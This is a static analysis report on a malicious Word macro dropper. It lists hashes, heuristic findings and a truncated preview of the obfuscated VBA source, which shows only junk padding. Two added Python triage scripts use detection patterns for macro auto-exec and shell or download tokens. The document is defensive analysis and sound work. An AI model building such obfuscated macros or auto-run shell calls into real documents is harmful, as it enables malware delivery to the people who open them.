Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7aa2581d4dcd546c…

MALICIOUS

Office (OLE)

Size: 183.0 KB
Created: 2017-11-23 11:11:00
Authoring application: Microsoft Office Word
First seen: 2017-11-29
MD5: b63c13f37715e261c94762f31c59fd2c
SHA-1: 09a10cfc112b18e03349ef3ea089cca1fd1d6b9b
SHA-256: 7aa2581d4dcd546c9345ffb3ecaefcfba0cc263d654f31836043683e693db9d6
Risk score: 244

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file contains a VBA macro project with an AutoOpen entry point, so the macro runs as soon as the document is opened with macros enabled. The Shell() call in the VBA code shows the macro launches an external process, which is the dropper behaviour that the ClamAV signature (Doc.Dropper.Agent-6381465-0) and the heuristics below flag. The decoded macro source is dominated by junk code: random-named string constants, Mid() slices taken from them, and unused Array() literals. This padding is there to defeat signature matching and to bury the small amount of live code, so the actual download or execution target has to be recovered from the live logic rather than from the dead stores. Of the two strings reported as URLs, http://khj+khjlAQ+l6wG3OtKNqszm is not a resolvable host name (a '+' is not valid in a DNS label) and is most likely a fragment of obfuscated data that happened to match the URL pattern, and http://schemas.openxmlformats.org/drawingml/2006/main is the standard DrawingML XML namespace found in benign documents. Neither should be treated as the payload location. Note also that the legacy WordBasic marker finding states that no modern VBA project was recovered, which is contradicted by the macros.bas artifact extracted below; treat that finding as a weak auxiliary signal and rely on the VBA findings.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6381465-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6381465-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://khj+khjlAQ+l6wG3OtKNqszm (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
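The following Python script is an added example, not code from the analysis platform or its heuristics. It reproduces the gist of the OLE_VBA_AUTOOPEN, OLE_VBA_SHELL and EMBEDDED_URL checks over decoded VBA source: it finds auto-execution entry points, finds process/COM/network tokens, and then classifies extracted URLs so that a regex hit inside obfuscated data or a schema namespace is not mistaken for a payload location. The sample macro and the example.com URL are constructed; the other two URLs are the ones listed in this report. It only works on decoded source, so it does not cover the p-code-only case that OLE_VBA_PCODE_AUTOEXEC_EXEC handles.

```python
import re

# Entry points Office runs automatically when a document is opened or closed
# (Word: AutoOpen/AutoExec/AutoClose/Document_Open; Excel: Auto_Open/Workbook_Open).
AUTOEXEC_RE = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+"
    r"(AutoOpen|AutoExec|AutoClose|Document_Open|Auto_Open|Workbook_Open)\b",
    re.I | re.M,
)

# Tokens that launch a process, instantiate COM objects or pull data from the network.
# Longer alternatives come first so "ShellExecute" is not reported as "Shell".
EXEC_TOKEN_RE = re.compile(
    r"\b(WScript\.Shell|ShellExecute|URLDownloadToFile|CreateObject|"
    r"ADODB\.Stream|MSXML2\.XMLHTTP|Shell)\b",
    re.I,
)

# Hostname grammar: dotted labels of letters/digits/hyphens plus an alphabetic TLD,
# or a dotted-quad IPv4 literal. Anything else cannot be looked up by a resolver.
HOSTNAME_RE = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$")
IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")

# XML namespace hosts that appear in the body of ordinary Office documents (assumed allowlist).
NAMESPACE_HOSTS = {"schemas.openxmlformats.org", "schemas.microsoft.com", "www.w3.org", "purl.org"}


def url_host(url: str) -> str:
    """Return the lower-cased host of an http(s) URL, dropping userinfo and port."""
    m = re.match(r"https?://([^/?#]+)", url, re.I)
    if not m:
        return ""
    netloc = m.group(1).rsplit("@", 1)[-1]
    return netloc.split(":", 1)[0].lower()


def classify_url(url: str) -> str:
    host = url_host(url)
    if not (HOSTNAME_RE.match(host) or IPV4_RE.match(host)):
        return "malformed-host"      # regex hit inside obfuscated data, not a real URL
    if host in NAMESPACE_HOSTS:
        return "benign-namespace"    # schema/namespace URI expected in document XML
    return "candidate"               # syntactically real; needs reputation/context review


def triage_vba(source: str, urls) -> dict:
    autoexec = list(dict.fromkeys(m.group(1) for m in AUTOEXEC_RE.finditer(source)))
    tokens = list(dict.fromkeys(m.group(1) for m in EXEC_TOKEN_RE.finditer(source)))
    return {
        "autoexec": autoexec,
        "exec_tokens": tokens,
        "urls": {u: classify_url(u) for u in urls},
        # Same combination the report keys on: auto-exec plus an execution token.
        "auto_exec_with_exec": bool(autoexec) and bool(tokens),
    }


# Constructed stand-in for the report's macro; the real one hides this behind junk code.
SAMPLE_VBA = '''\
Attribute VB_Name = "ThisDocument"
Sub AutoOpen()
    Set objShell = CreateObject("WScript.Shell")
    cmd = "cmd.exe /c echo constructed-sample"
    Shell cmd, vbHide
End Sub
'''
SAMPLE_URLS = [
    "http://khj+khjlAQ+l6wG3OtKNqszm",                        # from this report
    "http://schemas.openxmlformats.org/drawingml/2006/main",  # from this report
    "http://example.com/update.exe",                          # constructed, for contrast
]

if __name__ == "__main__":
    for key, value in triage_vba(SAMPLE_VBA, SAMPLE_URLS).items():
        print(f"{key}: {value}")
```

A "candidate" result is deliberately not a verdict: it only means the string is a URL a resolver could act on, so it is worth checking against the live macro logic and threat intelligence.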

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 223926 bytes
SHA-256: c40353b375d36f587f085648f8da0c367b6961f5c57b53c0bcea26350dc6272a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 72 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "mTiKaTRwK"
Function qNUrQOVht()
BvzViik = "qFaMXfImUtdIw57tL4PvWGlXnVqXfYzRbdYwYZZmVwMwDMDiROiAfbWikvZFcAYzirpw9kP"
iaFPsBzSNdN = Array("iMZwutcJ", "RhmOTjYU", "ZVphcoqU", "lQWjEQcJ", "NtOpjVXl", "QfCiJuAc", "miHWhKEt", "WEMiWwFA")
nsZNwkkOdL = Mid(BvzViik, 19, 33)
TiZWtuKE = Array("OlkZairT", "zpTqsfYT", "NPATUtca", "atnTaSHG", "QukfrDwT", "jFawCFTS", "ispTQvJU", "JKzhrXsj")
QLuhsbTtwNE = "McE1DmLjkOQvPMnlwjTIZGOnjuSMRddtItWPGYhBjwhQOHVfqVRiqvqowruTuKAzGZwZbczbiQ0zm"
HFVURYEiHI = Array("CFzMLNzn", "SUPIsGzc", "NbClfdAw", "wjPJCmOR", "VbJqkEsd", "FwsItPLZ", "bulXDQnZ", "EAQbznlj")
dsZOYtJ = Mid(QLuhsbTtwNE, 9, 52)
qjVcf = Array("qzWjdiwq", "iqjGhwJi", "MEimfmRv", "LifsoPoi", "HUnvkZlO", "XXuLvjRD", "qDjLdIYD", "faXwzFBS")
WdMjuMG = "MbY2A7dXK6 9Scd5qZvoqRMURbEBFMNQGJkOUmazrPJicCjwRjmzjzAiGnibpNdVlaVCfqoTwwzaIhrOsIjYaQjJJBHjEzKilnsChjRbsSwnAZaYvTjjdFuVuLsdiHPzlSpUpphLqHjHStIjbjkkPiAjsXHVnntkDwBhkFjGmXpWYnDADJCwXikHRIbRhzjT"
abJjfJjM = Array("WLPizzCj", "ACXkdYIY", "aJkZwvXs", "MPVrWWla", "RvSNsiDM", "qmzTtXtb", "hUbqWkCa", "oWWidLJd")
VmjqIpHrjFW = Mid(WdMjuMG, 18, 172)
SZsjItFw = Array("tNXZoKDc", "NQEXCiVj", "vYnELXNh", "jnKwSOut", "IUlWhPYl", "jbuoZHMB", "LsSzVQHW", "AptBzGKw")
KdjXfUAb = "1w0mQpu04BOkiljIrcmztjALLWviKoMBaRHzKuswMcDUIZdRXvdCzJXuSjjLqYsoDMKQdlwwjokRffDlsiHOLKEQuNfaOhPzGNzGFko"
BErScCzY = Array("HhXLwhpJ", "HdfGnzYV", "VQJjDjTj", "XRWwRLVc", "MsWOuzoZ", "ztYijVDc", "pRzjJIPY", "NrnjLtrw")
XdcPfnXYZZP = Mid(KdjXfUAb, 11, 84)
TjMzjoDpS = Array("pEhaCClK", "YXMPLGfA", "MpwbIwdT", "njDRVFQf", "szIzKDhV", "vBLivSKm", "HpCjLMcq", "bOmVzTpS")
pGjlfIwbjiZ = "60nczj4R4pZjI4hjYqwuwnWrdczSnvoBPEjinLEGwfudvDSXJsHYMKJqAJhkOkPUwzNsoEoPwjwCttwaKbIunQp61AA1YohI"
lkkGjvIw = Array("BpPqoccE", "JqQaZFZo", "OAWwcqIi", "IirvpKrT", "wzLtnADl", "RoZUTEzC", "aBrdTSzL", "jjhKljPw")
wPOphrkr = Mid(pGjlfIwbjiZ, 22, 66)
DNMrbsNqr = Array("VbJiLWbF", "uZJiiscY", "kZMaowSJ", "rFskqVYT", "SnDzvfQV", "KNWNjCqs", "OttiLkfZ", "IAqGdqPZ")
iTZhMTTobNr = "067U2YNQA3EvsidiTsMQZjvpZiEEsbfOGzHMGZmbVhjKIzvaKlcokmTMAkktEpvpJqovWQXtFkvsAljcmfN8DZ2aYjQE1bTRK5p80F8U"
iYMpG = Array("AhHEVzwC", "vOnmkqIE", "izdNcbza", "kNYiIoKF", "QCjGizID", "njDsTEwi", "IrGSSvmY", "ihUHbRuH")
ozpiMmhiiQw = Mid(iTZhMTTobNr, 11, 71)
kFXNQ = Array("luOqTrcG", "fbnphSsr", "GUooMCZz", "uibjzPaF", "hcwtvDYa", "BZRjoqEd", "DjmzGGrj", "URvkPvJP")
XUiSn = "FwQYDDiCfDuhYqXBMMqToHpkPvrlNjwcPZRlIhWiWnElknAHQTUESQRqGfIHLtowERSwZmsiqHwBDDzcvkUuOuKwHaidYOXczIhTUBhdapOKTQnDfjMaYtiKHTrzHPGbjUCvWjHtAYWtmEz1h1SQbvS"
bszNIVzjXw = Array("msbazhfl", "oXAOksbC", "jpfApvIW", "JvmzUUXb", "tRuqsUDU", "RAsVHRQm", "RCEqkAEr", "kFQBuhQT")
sUzFJlpnzmC = Mid(XUiSn, 2, 135)
cciTFBa = Array("wEDbSWzw", "VPuFPtzV", "KwbrIvZL", "WiqhzbcB", "dpwRqYID", "ruLhjUuB", "CzmhsHfB", "isEojPAu")
nlGQwJRiwaP = "Zw1ZNQu6XnnLXDOwDTrbzVziwsoiHFTHSiluMZOuPbdRYazmHcmPJD9W"
QwfadKRaAzf = Array("wFuFcKmB", "imBouhNr", "KjWjMjuz", "RiArEQdE", "CSCSjmpp", "WfqniQMj", "FQEwCFER", "LvntJuzO")
KiNEAbQ = Mid(nlGQwJRiwaP, 12, 39)
brjITjwshFC = Array("lzEdRjuj", "LAaZbQcz", "NJwfiiil", "VCAVstBU", "iWoRKLfJ", "dqjBXirR", "zIhVafEG", "QSHPfZoR")
jfwNmhdqcci = "diH6Hjmkjp6j3Ju31CVrzcZwtkAnXnrRamVfQGljksTXJqPTkwsfGmnZZMcmplzVOETt"
NtukQA = Array("HrYbLzTu", "YYulInsC", "HVFwbjfr", "bGmvbGmj", "ViYnwUEj", "EpNkUqEf", "jjPfbRZY", "MhzFNXTS")
fNCNcwn = Mid(jfwNmhdqcci, 20, 46)
pjsusUh = Array("BmzNbnWm", "McffffFq", "JCMLXnSX", "aDlpVLVn", "GDUFXOdn", "QlfffXwP", "jXjmIObN", "TcmXBhQB")
kbZJEIY = "zd4zEPBjqzfrEVjjJbJjztfrTnBWwatsSTjiFwLYsiGYsBWiVjwqVEvTtWbcZHTzhHUotEiMQkoRmHzRQWAOcCXNXPliViwlOJrlhilRFlakQijlXKMCGEUijHQdTvrhmDCdQ4ijTJrnJjqFRaT"
PdniAs = Array("jUEwuWuV", "oMDTzsjG", "fGirjhNw", "YXRCVsoF", "BcwtIrGI", "OwiSJDmz", "ozzAOjEw", "HHXXEszw")
ZEIkaRMw = Mid(kbZJEIY, 15, 119)
KwJo
... (truncated)
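The preview above is almost entirely the same three-line pattern: a long random string constant, a dead-store Array() literal, and a Mid() slice of the constant. As an added example (not the analysis platform's code and not part of the sample), the following Python resolver statically evaluates those Mid() slices and produces the kind of junk summary that the "72 long base64-like blob(s)" finding is based on. The embedded sample copies a few lines from the preview and adds a constructed demo/piece pair whose answer is obvious; the 40-character threshold for a base64-like blob is an assumption, since the report does not state the length it uses.

```python
import re

# name = "literal"   (VBA string constants; a doubled quote inside a literal is an escaped quote)
STR_ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*"((?:[^"\n]|"")*)"\s*$', re.M)
# dst = Mid(src, start, length)   with literal integer arguments only
MID_ASSIGN_RE = re.compile(
    r'^\s*([A-Za-z_]\w*)\s*=\s*Mid\(\s*([A-Za-z_]\w*)\s*,\s*(\d+)\s*,\s*(\d+)\s*\)\s*$',
    re.I | re.M,
)
# dead-store Array(...) literals of the kind padding the preview
ARRAY_JUNK_RE = re.compile(r'^\s*[A-Za-z_]\w*\s*=\s*Array\(', re.M)
# "base64-like": long runs of the base64 alphabet (40 is an assumed threshold)
B64_BLOB_RE = re.compile(r'[A-Za-z0-9+/]{40,}={0,2}')


def vba_mid(s: str, start: int, length: int) -> str:
    """VBA Mid(): 1-based start; a start past the end yields an empty string."""
    if start < 1 or length < 0:
        raise ValueError("invalid Mid() arguments")
    return s[start - 1:start - 1 + length]


def resolve_mid_slices(source: str):
    """Collect string constants, then evaluate every Mid() slice taken from them."""
    consts = {name: lit.replace('""', '"') for name, lit in STR_ASSIGN_RE.findall(source)}
    resolved = {}
    for dst, src, start, length in MID_ASSIGN_RE.findall(source):
        if src in consts:
            resolved[dst] = vba_mid(consts[src], int(start), int(length))
    return consts, resolved


def junk_summary(source: str) -> dict:
    consts, resolved = resolve_mid_slices(source)
    return {
        "string_constants": len(consts),
        "mid_slices": len(resolved),
        "dead_arrays": len(ARRAY_JUNK_RE.findall(source)),
        "b64_like_blobs": len(B64_BLOB_RE.findall(source)),
        "resolved": resolved,
    }


# Lines copied from the preview above, plus a constructed demo/piece pair at the end.
SAMPLE_VBA = '''\
Function qNUrQOVht()
BvzViik = "qFaMXfImUtdIw57tL4PvWGlXnVqXfYzRbdYwYZZmVwMwDMDiROiAfbWikvZFcAYzirpw9kP"
iaFPsBzSNdN = Array("iMZwutcJ", "RhmOTjYU", "ZVphcoqU", "lQWjEQcJ", "NtOpjVXl", "QfCiJuAc", "miHWhKEt", "WEMiWwFA")
nsZNwkkOdL = Mid(BvzViik, 19, 33)
QLuhsbTtwNE = "McE1DmLjkOQvPMnlwjTIZGOnjuSMRddtItWPGYhBjwhQOHVfqVRiqvqowruTuKAzGZwZbczbiQ0zm"
dsZOYtJ = Mid(QLuhsbTtwNE, 9, 52)
demo = "HelloWorldFoo"
piece = Mid(demo, 6, 5)
End Function
'''

if __name__ == "__main__":
    summary = junk_summary(SAMPLE_VBA)
    for key, value in summary.items():
        print(f"{key}: {value}")
```

When run on the full macros.bas, the resolved slices from this pattern are themselves random text, which is the point: they are dead stores whose only job is to inflate the module. Anything that survives after the junk stores are removed (a slice that feeds a Shell(), CreateObject() or a string concatenation that ends in a call) is the live code to follow.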